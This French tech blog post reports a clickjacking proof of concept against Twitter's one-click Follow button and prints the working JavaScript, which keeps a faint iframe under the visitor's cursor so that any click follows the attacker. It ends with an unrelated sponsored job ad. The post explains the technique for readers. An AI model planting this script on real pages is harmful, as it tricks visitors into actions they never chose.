Quantcast
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Korben Upgrade your mind

Twitter à nouveau victime d’un clickjacking

Peu de temps après la mise à disposition par Twitter d’un bouton « Follow » qui permet en 1 click de suivre quelqu’un sur Twitter, Pierre, un chercheur en sécurité a mis au point un proof of concept de click jacking assez fourbe. L’idée est qu’en masquant une iframe contenant un bouton de follow twitter, avec un petit coup de CSS et en en capturant avec du javascript les déplacements de la souris afin de positionner cette iframe sous le curseur de la victime, peu importe l’endroit où celle-ci clique dans la page, hop ça fera des followers de plus à l’attaquant.

Diabolique !

if (!document.getElementsByClassName){
 document.getElementsByClassName = function(classname){
   for (i=0; i < document.getElementsByTagName("*").length; i++)
    {
    if (document.getElementsByTagName("*").item(i).className == classname){
    return new Array(document.getElementsByTagName("*").item(i));
    }
  }
 }
}

var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';

document.onmousemove = function(e){
        if ( !e ) e = window.event;
        twitterFollowIframe.style.left = e.clientX - 20;
        twitterFollowIframe.style.top = e.clientY - 10;
}

Si vous voulez voir une démo live du PoC, cliquez ici. Il a mis la transparence à 40% pour que vous puissiez voir le bouton twitter sous votre souris, mais sachez qu’en la mettant à 100%, ce sera totalement invisible.

Oups 😉

Evidemment, comme vous me l’avez fait remarqué dans les commentaires, cette technique de click jacking peut aussi s’appliquer à d’autres choses comme le Like de Facebook ou le +1 de Google. Les système d’abonnement ou de vote 1 click seront toujours à la merci de ce genre de choses.

Merci à John Jean pour l’info

[Source et photo]


A la recherche d’un job dans le numérique et envie de changer de région et de vie ?

Est-ce que je fais vraiment le boulot que j’aime ? Ma qualité de vie dans cette grosse ville bruyante, polluée, chère … est-elle vraiment la meilleure ? Est-ce que ce village de campagne est le lieu le plus propice pour préparer mes enfants au futur ? Nous sommes nombreux à nous être posé ce genre de questions à un moment ou un autre, moi le premier.

Et bien si vous êtes dans cette situation, que vous avez envie de changer d’air sans pour autant changer de travail, Laou vous accompagne dans toutes les étapes de ce nouveau voyage, pour que vous ayez l’esprit serein jusqu’au moment d’envoyer votre premier mail pro 😉

Découvrir leur service et lancez-vous